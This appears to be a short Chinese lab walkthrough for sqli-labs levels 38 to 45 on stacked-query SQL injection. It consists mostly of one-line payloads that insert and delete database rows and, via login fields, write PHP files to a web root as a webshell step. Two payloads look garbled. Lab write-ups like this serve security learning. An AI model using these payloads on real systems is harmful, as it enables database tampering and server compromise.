后面看了下,都是"堆叠"注入,其实就是执行另外的sql语句。
Less-38 stacked Query - String
手工注入
- 没啥好讲的,直接上,
id=1';insert into users(id,username,password) values ("10086","test","test") --+
函数分析
- 无
Less-39 stacked Query - Integer
手工注入
- 和之前查询不一样,查询如果是整形可以不需要注释,但是这里是需要执行其他语句,如果不加注释有可能会报错的,所以注释还是得加上。
id=1;delete from users where id=10086 --+
函数分析
- 无
Less-40 stacked Query String type Blind
手工注入
- 盲注。然后和38关一样,闭合改为了单引号和括号。
id=1') ; insert into users(id,username,password) values ("10086","test","test") --+
函数分析
- 无
Less-41 stacked Query Integer type Blind
手工注入
- 盲注。然后和39关一样。
id=1; delete from users where id=10086 --+
函数分析
- 无
Less-42 - Stacked Query error based - Post
手工注入
- 看起来很像之前的二次注入,但是这次不需要,可以直接在密码处进行注入(偷偷看过源码了。。。)
- 这次换个函数,往里面写webshell吧,之前也用过,直接用burpsuite来改。
login_user=admin&login_password=1';select 123 into outfile "/var/www/html/test/test.php" #&mysubmit=Login
函数分析
- 无
Less-43 - Stacked Query based twist - Post
手工注入
- 和42一样。闭合是单引号加括号。
login_user=admin&login_password=1)';select 1234 into outfile "/var/www/html/test/test.php" #&mysubmit=Login
函数分析
- 无
Less-44 - Stacked Query blind - Post
手工注入
- 和42一样。
login_user=admin&login_password=1';select 123 into outfile "/var/www/html/test/test.php" #&mysubmit=Login
函数分析
- 无
Less-45 - Stacked Query Blind based twist - Post
手工注入
- 和42一样。
login_user=admin&login_password=1)';select 1234 into outfile "/var/www/html/test/test.php" #&mysubmit=Login
函数分析
- 无